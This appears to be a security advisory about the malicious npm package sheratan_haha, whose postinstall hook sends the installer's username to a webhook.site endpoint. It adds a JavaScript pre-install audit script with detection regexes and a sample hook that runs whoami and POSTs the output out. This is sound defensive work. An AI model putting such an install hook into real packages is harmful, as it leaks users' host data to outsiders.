Vulnerability
Malicious code in sheratan_haha (npm)
## Source: amazon-inspector (6b473b40e0c041d34e85161ed8c91e0e00d006a0822698a0d3994876cb685ddd)

On `npm install`, the package's declared postinstall hook (`node postinstall.js`) runs `whoami` on the installer's machine and POSTs the output to a hardcoded webhook.site endpoint (`https://webhook.site/0ea9eb45-3ede-4cf0-9ea9-2b8d700272e7`) via `https.request`. The package advertises itself as 'A simple date formatting utility' but ships no library code consistent with that purpose; the only behavior on install is host fingerprinting and exfiltration to an attacker-controlled URL. Metadata is placeholder-shaped (empty author, generic description, name `sheratan_haha`), consistent with a dependency-confusion / recon PoC. Installing this package leaks the installer's OS username to an external endpoint controlled by the publisher.
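The pattern described above (an install hook that shells out for host identity and then makes an outbound request to a request-catcher endpoint) is one that a pre-install audit can catch before `npm install` runs the hook. The following script is an added example written for this page; it is not Inspector's detection logic and not code from the package. It reads a package's `package.json` and the shipped hook script, flags install lifecycle hooks, and scans the hook's source for the indicator classes the advisory describes. The indicator list, the `auditPackage` / `findInstallHooks` / `scanHookScript` names and the sample package contents (including the `PLACEHOLDER` webhook path) are all constructed for the example.

```javascript
// Added example: pre-install audit of an npm package's lifecycle hooks.
// Not from the advisory, Amazon Inspector, or the sheratan_haha package.

// npm lifecycle scripts that execute on the installer's machine during `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Indicator classes a reviewer would flag in an install hook (constructed for this example).
const INDICATORS = [
  { id: 'exec-shell',       re: /child_process|execSync\(|exec\(|spawn\(/,            why: 'runs a shell command' },
  { id: 'host-fingerprint', re: /\bwhoami\b|os\.userInfo\(|os\.hostname\(|process\.env\b/, why: 'collects host identity' },
  { id: 'outbound-http',    re: /https?\.request\(|fetch\(|axios|XMLHttpRequest/,     why: 'makes an outbound HTTP request' },
  { id: 'webhook-sink',     re: /webhook\.site|requestbin|pipedream|ngrok\.io/i,      why: 'targets a disposable request-catcher endpoint' },
];

// Return the lifecycle hooks the package declares, with their commands.
function findInstallHooks(pkg) {
  const scripts = (pkg && pkg.scripts) || {};
  return INSTALL_HOOKS
    .filter((h) => typeof scripts[h] === 'string')
    .map((h) => ({ hook: h, command: scripts[h] }));
}

// Return the ids of every indicator class present in a hook's source text.
function scanHookScript(source) {
  return INDICATORS.filter((ind) => ind.re.test(source)).map((ind) => ind.id);
}

// Audit a package: `pkg` is the parsed package.json, `files` maps tarball paths to file contents.
// Verdict: 'clean' (no hooks), 'review' (hooks present), 'block' (host data plus network egress).
function auditPackage(pkg, files) {
  const hooks = findInstallHooks(pkg);
  const findings = hooks.map(({ hook, command }) => {
    // A `node <file>` command is resolved to the shipped file; any other command is scanned as-is.
    const m = /^node\s+(\S+)/.exec(command.trim());
    const source = m && files && files[m[1]] !== undefined ? files[m[1]] : command;
    return { hook, command, hits: scanHookScript(source) };
  });
  const all = new Set(findings.flatMap((f) => f.hits));
  const collects = all.has('exec-shell') || all.has('host-fingerprint');
  const egress = all.has('outbound-http') || all.has('webhook-sink');
  let verdict = 'clean';
  if (hooks.length > 0) verdict = 'review';
  if (collects && egress) verdict = 'block';
  return { verdict, findings };
}

// Constructed sample mirroring the behaviour the advisory describes (placeholder endpoint path).
const SAMPLE_PKG = {
  name: 'sample-date-utils',
  description: 'A simple date formatting utility',
  scripts: { postinstall: 'node postinstall.js' },
};
const SAMPLE_FILES = {
  'postinstall.js': [
    "const { execSync } = require('child_process');",
    "const https = require('https');",
    "const user = execSync('whoami').toString().trim();",
    "const req = https.request({ hostname: 'webhook.site', path: '/PLACEHOLDER', method: 'POST' });",
    'req.end(user);',
  ].join('\n'),
};

// Constructed benign comparison: a native addon whose hook only rebuilds itself.
const NATIVE_PKG = { name: 'sample-addon', scripts: { install: 'node-gyp rebuild' } };

if (typeof require !== 'undefined' && typeof module !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditPackage(SAMPLE_PKG, SAMPLE_FILES), null, 2));
  console.log(JSON.stringify(auditPackage(NATIVE_PKG, {}), null, 2));
}
```

Run it against the extracted contents of a tarball (`npm pack <name>` then `tar -xzf`) before the package is installed anywhere that runs lifecycle scripts; `npm install --ignore-scripts` is the complementary control when the audit cannot be run first. The verdict is deliberately coarse: any hook at all earns a review, and only the combination of host-data collection with outbound egress is treated as a block.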
No CVSS base score from NVD or GHSA yet. NVD typically scores within 24–72 hours of publication; GHSA usually within a day for OSS-flagged CVEs. Last record update .
For interim severity, fall back on KEV / exploit signals and the EPSS percentile. Re-check this record after the next scheduled refresh; the score is filled in automatically once the source publishes it.
FIRST.org publishes EPSS daily. Coverage isn't universal — pre-disclosure CVEs and reserved IDs don't carry an EPSS score until at least one exploitation signal lands. Score will appear within 24 hours of the next EPSS pull.
No exploitation, limited impact or prevalence